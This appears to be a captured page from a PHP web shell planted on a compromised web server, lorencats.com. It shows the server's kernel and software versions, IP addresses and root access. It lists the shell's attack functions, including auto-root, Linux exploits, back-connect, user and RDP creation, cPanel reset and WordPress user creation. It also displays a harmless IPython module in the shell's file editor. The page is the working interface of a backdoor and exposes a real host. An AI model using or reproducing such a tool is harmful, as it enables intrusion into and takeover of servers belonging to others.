Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.228
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
IPython /
kernel /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
1.16
KB
-rw-r--r--
__main__.py
100
B
-rw-r--r--
adapter.py
37
B
-rw-r--r--
channels.py
38
B
-rw-r--r--
channelsabc.py
41
B
-rw-r--r--
client.py
36
B
-rw-r--r--
clientabc.py
39
B
-rw-r--r--
connect.py
69
B
-rw-r--r--
kernelspec.py
40
B
-rw-r--r--
kernelspecapp.py
43
B
-rw-r--r--
launcher.py
38
B
-rw-r--r--
manager.py
37
B
-rw-r--r--
managerabc.py
40
B
-rw-r--r--
multikernelmanager.py
48
B
-rw-r--r--
restarter.py
39
B
-rw-r--r--
threaded.py
38
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __init__.py
""" Shim to maintain backwards compatibility with old IPython.kernel imports. """ # Copyright (c) IPython Development Team. # Distributed under the terms of the Modified BSD License. import sys from warnings import warn from IPython.utils.shimmodule import ShimModule, ShimWarning warn("The `IPython.kernel` package has been deprecated since IPython 4.0." "You should import from ipykernel or jupyter_client instead.", ShimWarning) # zmq subdir is gone sys.modules['IPython.kernel.zmq.session'] = ShimModule( src='IPython.kernel.zmq.session', mirror='jupyter_client.session') sys.modules['IPython.kernel.zmq'] = ShimModule( src='IPython.kernel.zmq', mirror='ipykernel') for pkg in ('comm', 'inprocess'): src = 'IPython.kernel.%s' % pkg sys.modules[src] = ShimModule(src=src, mirror='ipykernel.%s' % pkg) for pkg in ('ioloop', 'blocking'): src = 'IPython.kernel.%s' % pkg sys.modules[src] = ShimModule(src=src, mirror='jupyter_client.%s' % pkg) # required for `from IPython.kernel import PKG` from ipykernel import comm, inprocess from jupyter_client import ioloop, blocking # public API from ipykernel.connect import * from jupyter_client import *
Close